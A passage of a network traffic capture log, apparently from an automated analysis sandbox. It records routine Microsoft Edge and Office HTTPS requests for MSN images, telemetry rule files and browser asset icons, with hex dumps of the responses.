2024-11-11 23:06:28 UTC	634	OUT	GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:28 UTC	518	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1t99ka Last-Modified: Fri, 01 Nov 2024 18:01:14 GMT X-Source-Length: 20811 X-Datacenter: eastus X-ActivityId: ee99dc34-c4cc-40d2-beb4-909b60878009 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 20811 Cache-Control: public, max-age=327439 Expires: Fri, 15 Nov 2024 18:03:47 GMT Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close
2024-11-11 23:06:28 UTC	15866	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 02 00 00 00 0f dd a1 9b 00 00 0c 3e 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 10 20 80 80 94 d0 9b 20 22 25 80 94 10 5a 00 e9 45 b0 11 92 00 a1 c4 18 08 2a 76 74 51 c1 b5 8b 08 d8 d0 55 11 c5 0e 88 1d b1 b3 28 f6 be 58 50 50 d6 c5 82 5d 79 93 02 ba ee 2b df 9b 7c 33 f3 e7 9f 33 ff 39 73 ee dc 32 00 d0 4f f0 24 92 1c 54 13 80 5c 71 be 34 36 24 80 39 26 39 85 49 ea 02 28 a0 c2 df 50 40 e7 f1 f3 24 ec e8 e8 08 00 cb 40 ff f7 f2 ee 06 40 e4 fd 55 47 b9 d6 3f c7 ff 6b d1 12 08 f3 f8 00 20 d1 10 a7 09 f2 f8 b9 10 1f 00 00 af e2 4b a4 f9 00 10 e5 bc c5 94 7c 89 1c c3 0a 74 a4 30 40 88 17 ca 71 86 12 57 c9 71 9a 12 ef 51 d8 c4 c7 72 20 6e Data Ascii: PNGIHDR>iCCPICC ProfileHWXS[ "%ZE*vtQU(XPP]y+\|339s2O$T\q46$9&9I(P@$@@UG?k K\|t0@qWqQr n
2024-11-11 23:06:28 UTC	4945	IN	Data Raw: 3d f7 52 13 58 62 fb e9 21 5b 75 03 17 1c 54 6d 19 c9 a8 68 28 42 9d 72 18 59 2e 37 2a 0c 62 39 95 49 f4 d3 4f 3f dd 5c 95 c7 7f 5e 26 47 55 66 a3 ea 36 56 f1 51 09 75 c5 13 0a 63 96 51 3e 61 c6 4e 30 31 02 fb 25 ac ba ef f1 51 a3 42 71 d6 c4 60 4d d0 b4 22 a3 45 5b 46 7d 48 2d fb 24 ab b3 11 2c 12 46 4c d6 28 60 28 2f fd 89 ad 4e 3b ed b4 70 0a 37 30 5d 55 33 e8 8b ab f4 61 23 b0 4f 04 f6 4b 58 2e 2f c8 4a 25 4c 43 94 67 ef b3 5a 9d fd c0 11 18 09 68 2c 3c 41 d3 0e 86 ab 53 52 ba 3f f9 a6 85 af a7 7b ea 87 ad bc 55 63 45 55 e2 a9 dc ba b0 55 85 57 e3 55 5a 6e 04 0e 04 81 03 20 ac 72 d0 12 0e a4 66 5d c8 c1 22 50 bc b3 28 36 fa d0 96 53 95 ac 04 4a 67 05 4d 1e e7 99 a2 fa ae ef fa 2e 2f d3 58 05 2a c8 0a 49 b9 63 89 ac 13 61 49 46 40 5b 8b 77 92 17 17 ed Data Ascii: =RXb![uTmh(BrY.7b9IO?\^&GUf6VQucQ>aN01%QBq`M"E[F}H-$,FL(`(/N;p70]U3a#OKX./J%LCgZh,<ASR?{UcEUUWUZn rf]"P(6SJgM./XIcaIF@[w

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.5	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:28 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 01111fca-d01e-002b-41d5-3325fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230628Z-174f7845968glpgnhC1EWR7uec00000005qg00000000h7zh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:28 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.5	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: c8358f32-201e-005d-77d5-33afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230628Z-174f7845968v79b7hC1EWRu01s000000058g000000006mmb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.5	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:28 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 554aabf5-b01e-00ab-71d5-33dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230628Z-174f7845968nnm4mhC1EWR1rn400000005ng000000001mug x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:28 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.5	49868	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:28 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:28 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 77d57460-901e-0083-6dd5-33bb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230628Z-174f78459685m244hC1EWRgp2c00000005dg00000000debf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:28 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49873	20.110.205.119	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	1271	OUT	GET /c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=06FBC860557247358032020AD74BA317&MUID=11FAD531813A66492642C0058058675E HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1; SM=T
2024-11-11 23:06:29 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT Accept-Ranges: bytes ETag: "8d3dafd6e71fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=11FAD531813A66492642C0058058675E; domain=.msn.com; expires=Sat, 06-Dec-2025 23:06:29 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=11FAD531813A66492642C0058058675E; domain=c.msn.com; expires=Sat, 06-Dec-2025 23:06:29 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 18-Nov-2024 23:06:29 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 11-Nov-2024 23:16:29 GMT; path=/; SameSite=None; Secure; Date: Mon, 11 Nov 2024 23:06:28 GMT Connection: close Content-Length: 42
2024-11-11 23:06:29 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49881	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 96858d24-c01e-0053-2666-347408000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968t42glhC1EWRa36w00000005d0000000003cyt Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49887	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: 37f690f1-701e-0027-1766-34f24e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968cdxdrhC1EWRg0en00000005mg000000005k7u Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	49883	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: 571edae1-a01e-000c-7866-3486f6000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968cdxdrhC1EWRg0en00000005f000000000qh7p Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49885	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: 62884183-001e-000a-5466-34718e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968psccphC1EWRuz9s00000005r000000000sere Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	49886	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
